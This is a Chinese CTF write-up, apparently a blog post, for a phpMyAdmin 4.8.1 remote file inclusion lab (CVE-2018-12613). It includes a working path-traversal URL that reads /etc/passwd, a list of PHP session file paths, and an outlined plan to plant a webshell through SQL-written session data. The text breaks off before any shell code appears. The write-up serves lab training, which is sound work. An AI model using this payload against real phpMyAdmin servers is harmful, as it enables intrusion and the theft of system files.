墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

靶场地址:
http://219.153.49.228:45122/
相关知识:

1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
2.php代码审计
3.base64编码绕过

思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell。
获取key(弱口令登录就省了root/root):

1.构造绕过白名单的url:http://219.153.49.228:45122/index.php?target=db_sql.php%253f/…/…/…/…/…/etc/passwd
测试结果,成功:在这里插入图片描述
2.执行SQL查询,写入一句话木马,此时由于php的session会话机制会把文件写入到服务器session的文件。
常见session文件的保存目录:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
①.写入一句话木马

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值